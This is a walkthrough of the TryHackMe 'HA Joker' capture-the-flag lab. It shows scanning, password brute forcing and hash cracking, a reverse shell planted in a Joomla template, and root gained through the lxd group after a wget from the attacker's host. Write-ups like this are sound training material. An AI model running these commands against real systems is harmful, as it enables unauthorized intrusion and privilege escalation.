Tryhackme HA Joker CTF Writeup
Let’s start with nmap scanning first
Command: nmap -vv -sCV 10.10.185.86
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL89x6yGLD8uQ9HgFK1nvBGpjT6KJXIwZZ56/pjgdRK/dOSpvl0ckMaa68V9bLHvn0Oerh2oa4Q5yCnwddrQnm7JHJ4gNAM+lg+ML7+cIULAHqXFKPpPAjvEWJ7T6+NRrLc9q8EixBsbEPuNer4tGGyUJXg6GpjWL5jZ79TwZ80ANcYPVGPZbrcCfx5yR/1KBTcpEdUsounHjpnpDS/i+2rJ3ua8IPUrqcY3GzlDcvF7d/+oO9GxQ0wjpy1po6lDJ/LytU6IPFZ1Gn/xpRsOxw0N35S7fDuhn69XlXj8xiDDbTlOhD4sNxckX0veXKpo6ynQh5t3yM5CxAQdqRKgFF
| 256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOzF9YUxQxzgUVsmwq9ZtROK9XiPOB0quHBIwbMQPScfnLbF3/Fws+Ffm/l0NV7aIua0W7FLGP3U4cxZEDFIzfQ=
| 256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLWfYB8/GSsvhS7b9c6hpXJCO6p1RvLsv4RJMvN4B3r
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Joker
8080/tcp open http syn-ack Apache httpd 2.4.29
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Please enter the password.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernelLet’s do a directory scan on the http port number 80
Command: gobuster dir -u http://10.10.185.86 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.185.86
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2021/02/28 14:35:22 Starting gobuster
===============================================================
/img (Status: 301)
/css (Status: 301)
/secret.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2021/02/28 14:55:59 Finished
===============================================================Let’s take a look at the “secret.txt” file we found.
It looks like a conversation between Joker and Batman. However, these can be a username.
Let’s take a look at the other 8080 http port we found.
I think we can brute force here with the username we just found.
Command: hydra -l joker -P /home/hakanbey/Desktop/rockyou.txt -f 10.10.185.86 -s 8080 http-get
Yes we found the password. We can now log in.
Again, we need to scan the directory, but since we are logged in with 401, we need to specify this in the gobuster.
Command: gobuster dir -U joker -P ha**** -u http://10.10.185.86 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.185.86:8080
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Auth User: joker
[+] Timeout: 10s
===============================================================
2021/02/28 15:14:28 Starting gobuster
===============================================================
/images (Status: 301)
/bin (Status: 301)
/plugins (Status: 301)
/includes (Status: 301)
/language (Status: 301)
/README (Status: 200)
/components (Status: 301)
/modules (Status: 301)
/cache (Status: 301)
/libraries (Status: 301)
/media (Status: 301)
/robots (Status: 200)
/templates (Status: 301)
/tmp (Status: 301)
/LICENSE (Status: 200)
/layouts (Status: 301)
/backup (Status: 200)
/administrator (Status: 301)
/htaccess (Status: 200)
/cli (Status: 301)
===============================================================
2021/02/28 15:17:31 Finished
===============================================================We have to download the file named “backup”. I think this “backup” is an encrypted zip file.
We can crack the password of the zip file using the “zip2john” and “john” tools.
Command: /usr/sbin/zip2john backup > hash
Command: john -w=/home/hakanbey/Desktop/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ha**** (backup)
1g 0:00:00:00 DONE (2021-02-28 15:25) 100.0g/s 1228Kp/s 1228Kc/s 1228KC/s 123456..henrik
Use the "--show" option to display all of the cracked passwords reliably
Session completedYes, we now have the password. We can see the inside of the zip file.
Command: unzip backup
Two files named “db” and “site” came out of the zip. When we enter the file named “db”, we find the file “joomladb.sql”. Let’s read this differently.
Command: cat joomladb.sql|grep users
`INSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com','$2y$10$b43UqoH5UpXokj2y******************************',0,1,'2019-10-08 12:00:15','2019-10-25 15:20:02','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0);
/*!40000 ALTER TABLE `cc1gr_users` ENABLE KEYS */;Yes, we got the password of the user named admin from the datebase file, but it is encrypted with bcrypt, let’s break it with john.
Command: john -w=/home/hakanbey/Desktop/rockyou.txt hash2
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ab****** (?)
1g 0:00:00:03 DONE (2021-02-28 15:32) 0.2985g/s 306.2p/s 306.2c/s 306.2C/s 87654321..kucing
Use the "--show" option to display all of the cracked passwords reliably
Session completedNow we have the password for the user named admin. Let’s log in from the Joomla login page.
Yes we are inside now. Let’s take a shell now. From the menu above, we go to the Extensions-Templates-Templates tab. Then select the “Beez3” theme and edit “error.php” from the side. Let’s paste our reverse shell codes here.
Now let’s start listening with netcat and enable reverse shell.
Command: nc -lvp 4444
Command: http://10.10.185.86:8080/templates/beez3/error.php
10.10.185.86: inverse host lookup failed: Unknown host
connect to [10.9.45.10] from (UNKNOWN) [10.10.185.86] 37476
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
12:44:32 up 47 min, 0 users, load average: 0.00, 0.20, 3.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
/bin/sh: 0: can't access tty; job control turned off
$We spawn pty with Python and export xterm.
Command: python3 -c 'import pty;pty.spawn(''/bin/bash'')'
Command: export TERM=xterm
www-data@ubuntu:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
www-data@ubuntu:/$We can now increase the authority. We saw that the www-data user belongs to the lxd group.
First of all, we do the following steps on our own machine.
git clone https://github.com/saghul/lxd-alpine-builder.gitcd lxd-alpine-builder./build-alpine-------------------------------------------------------------
python -m SimpleHTTPServer
In this part, we do it on the target machine.
cd /tmpwget 10.9.45.10:8000/apline-v3.10-x86_64-20191008_1227.tar.gzlxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimagelxc init myimage ignite -c security.privileged=truelxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=truelxc start ignitelxc exec ignite /bin/sh
We are root now
Command: cd /mnt/root/root/ && cat /final.txt
Thank you for reading and solving